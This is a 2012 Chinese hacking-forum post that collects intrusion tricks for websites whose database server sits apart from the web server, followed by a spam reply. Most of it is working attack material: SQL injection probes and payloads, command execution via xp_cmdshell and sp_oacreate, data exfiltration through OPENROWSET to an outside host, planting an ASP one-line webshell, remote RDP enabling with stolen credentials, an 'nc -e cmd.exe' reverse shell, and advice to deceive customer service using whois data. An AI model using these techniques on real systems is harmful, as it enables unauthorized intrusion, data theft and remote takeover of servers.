找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3437|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
8 m9 V8 |. V1 ~0 j- R. e# m% V, p; V7 N6 \/ }  q4 u" _2 M+ L  f

" p, U/ w) ~, A2 RSA点数据库分离搞法+语句:# h6 }2 m( i$ I$ _9 h+ r# m

! `  F/ K! D) v' O- b: j" W注射点不显错,执行下面三条语句页面都返回正常。
& D' Z% {4 t+ J' O' L' xand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
  P$ h7 N8 @: _+ ?7 a" r. Hand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
: \: ^: T' _2 Y3 v7 L- ~( U9 xand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
, y' l; ^: e* |可以列目录,判断系统为2000,web与数据库分离
  W9 q& @- m! K+ N1 D1 b# `遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
6 o( i/ O% e( N% A6 `! w  V* n1 I在注射点上执行
3 R. r& z7 P) D9 b# q4 k8 a+ tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--; d- U* ], V/ l" \0 t! v- K; O5 K# k
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
. ]9 E$ Y, g- I0 E9 Y) c0 ]还有我用NC监听得其他端口都没有得到IP。' G1 W! J# [' W% q. c% j

. Y% P7 v7 Q1 [通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。+ E" |1 O* A2 P  o4 ^( i& H
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
" Q( M6 v! G' h( p
- L7 P$ s' w5 g9 [/ N+ W% P/ v& u! D;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
: ?* H! }1 E9 w$ u
' @7 d6 c9 S* ]% p4 o现在就猜想是不是数据库是内网而且不能连外网。
; D, A- Q, ^' u. g9 b+ g! d. o8 h3 b; D1 ]& N
; Y6 D9 f$ ?  A8 h6 C
access导出txt文本代码
! u8 G2 E9 i8 V8 d4 R+ M0 aSELECT * into [test.txt] in 'd:\web\' 'text;' from admin3 P4 ?7 P- R+ u& T
  U! T  w1 \0 C# ]) Q8 D

3 c, I0 D, w/ @# F! h2 ^
7 E5 N1 G+ r2 q8 B' l自动跳转到指定网站代码头
% r: |+ h" K  W8 s. q+ n' {<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
! u9 z+ I6 g$ R& p) a
5 k0 j: |; ], T. j' @0 ~& k; k5 {& Z* H9 k
6 q8 B, R/ Q* ]! x/ ]入侵java or jsp站点时默认配置文件路径:0 E' u& f, N4 \5 ^5 |) t
\web-inf\web.xml- ^# x& `( R1 M5 f  @
tomcat下的配置文件位置:( A$ j( g. R7 R0 e* {
\conf\server.xml            (前面加上tomcat路径)
; ^/ \  ]1 H+ {2 P! j( T3 `6 \0 u\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
) I, w2 [3 r; A# i7 ]- {7 @; j8 n* L+ c9 r0 ^; e& [

6 |' m# J' e/ r* [$ u
: w; V5 n% r& d9 Z* T4 |7 w检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:' R$ W: J, {6 M% L) k; o2 T
-1%23
! e9 r- A2 h) u' X: M% [7 x' I1 e- G> 9 U' X9 ~; F1 ^. ]7 g1 ~
<
( |3 c0 J+ i' c3 F1'+or+'1'='1! V  U: [/ x" ^  I1 `+ m
id=8%bf
6 E3 q+ c7 v! f& U
% T6 p0 Z$ U  v" \, W3 d" [. Q9 F全新注入点检测试法:" I# \# [6 u$ ?7 F, S7 `& y
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
: \; d/ h. i  r8 z4 e7 X2 p7 N, @. ]$ a, w* P8 P# S  ]$ Z# p
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。7 ^5 _1 ]9 O% i1 F' |: S2 |
; F9 f% z( B, ]; x3 l" M
搜索型注入判断方法:5 p0 }  V6 h$ P8 X: J. p
北京%' and '1'='1' and '%'=': b+ X# D1 M6 b. Y
北京%' and '1'='2' and '%'='. ~4 H% t4 T% A9 C# a1 S
4 c# l) G: x* `* ~; f  l
2 T0 G- O6 g5 j
COOKIES注入:
/ ]" B, |: k! T
0 M  D: W6 N; `. e; T- Cjavascript:alert(document.cookie="id="+escape("51 and 1=1"));- m& T0 p' S% ~0 K6 T/ Q2 T) S

" v! s+ B9 Z+ p7 r4 [" Z$ _" b2000专业版查看本地登录用户命令:
# J$ I" [2 a2 w" [. n; Q' Dnet config workstation
* T& c3 u" D! y
9 J. ~& M* L; G; o8 y4 _
& k7 Y4 E6 {1 C  H( C3 @: K9 }2003下查看ipsec配置和默认防火墙配置命令:
( j7 q% C+ P$ s. n) qnetsh firewall show config
$ c9 H- R! ^, @& p1 h: Tnetsh ipsec static show all
* I, x4 p1 c. W7 F5 C: y4 l& L2 e
9 d: m6 T2 N) i不指派指定策略命令:
* U, L! ^9 b2 A4 Enetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
2 F+ \6 S# Z1 x5 snetsh ipsec static show policy all  显示策略名( e% l5 d9 x: I
1 [+ l- Q0 N" b' y$ I
6 j, k" U  b8 r* Z5 X0 S$ ~7 j9 ~+ k. p
猜管理员后台小技巧:
, Y/ a( O2 i3 y) q$ l( v, I: gadmin/left.asp
; l/ X" G  N! o6 c4 O1 g/ @admin/main.asp1 T; g" j3 s8 U) U: k3 R! o
admin/top.asp$ v1 k0 T4 W) o7 m" i/ K- s
admin/admin.asp 2 T% x" e- O% @' ^- F3 b: c
会现出菜单导航,然后迅雷下载全部链接0 ?7 |3 W6 i* }% G6 E
* i0 _) A$ O. y* \- B

2 K8 T' U8 e: M1 T$ d5 N2 Q社会工程学:
  G  Y3 t9 z! n) [) }1 [用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
" ^1 b6 h5 l0 \; G  v. m; F然后去骗客服
! R" Z2 ?" i/ Y2 {& l$ o
% u4 ~8 M9 E+ V, p) L  b( e: X" ^* P( K  @* R
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 6 _1 K8 `& p4 Q
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
! |* Z( u! m  ]' S  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。7 H5 G, \% ?1 J: X- s) d9 D) M9 H# m
* A1 g+ x$ ~6 u

' P1 }; `* V0 F* e" L
, G% P( X% ^  U; g6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
1 \' o* z7 U3 y" W$ X2 |9 K1 i5 d
$ ]$ L! W! f' A, q/ t' c, t3 e+ A- K& ~' _

: R6 J, a6 q: B8 Z3 |+ Q' U" kCMD加密注册表位置
0 J8 U1 q% T4 ]1 S  z9 P(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
7 N( d3 `# S# ZAutoRun, C* u  j6 J/ w) V0 f
7 f- D1 M) i9 f+ \5 i% E) w
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
% J& {6 I" Y2 l3 E, dAutoRun$ Q9 l; A/ G& t  O3 }
) c: |' Y! I/ C% B" [1 j

- t4 m, H& J/ T在找注入时搜索Hidden,把他改成test
  V% g- D+ X6 e/ j$ k, X$ N0 X0 s- Z1 X* H

# B" X5 n. Z$ ~$ x( d$ f/ d8 Y( e, P! U# ^
mstsc /v:IP /console : f  S/ V+ G3 e, l4 H0 `

$ v/ C2 e( v7 O3 N5 g( p/ g  Z+ u2 l+ t6 p
一句话开3389:7 g5 p" E4 S8 R( F

2 P' H8 X0 n; ^1 m9 V最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
4 F7 D9 F' A) [- z0 b9 ?% z- D7 L! i开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
! R4 {/ z! z; o* Q4 S2 C7 H+ i. X# H0 Z

/ P. |! s. n) Q8 f知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
' [6 \' O8 W7 l  E( j( yInsert into admin(user,pwd) values('test','test')* h; y0 _" \' {3 L3 s" k

( g. w' K* ~$ Z- l3 o7 t# P( l/ c7 c% W3 V
NC反弹% r+ m6 J8 w; ^# i9 B
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
; q3 N, ~4 |6 j# m3 R; D然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
3 ]4 H4 U. u0 g$ C( s5 h2 [9 G3 _$ a
) F0 k' g6 l8 W  v2 [# x
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
0 `% I: G6 e! V- c( ^. x' X% A. P  L+ R/ ]
0 h6 X& X/ \: p* O+ a! I有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录7 T# T" |; u+ O2 Q! m% S) E
例如:. Q: x% B5 _. r
subst k: d:\www\ 用d盘www目录替代k盘' \/ q5 k" O2 s* k& S
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表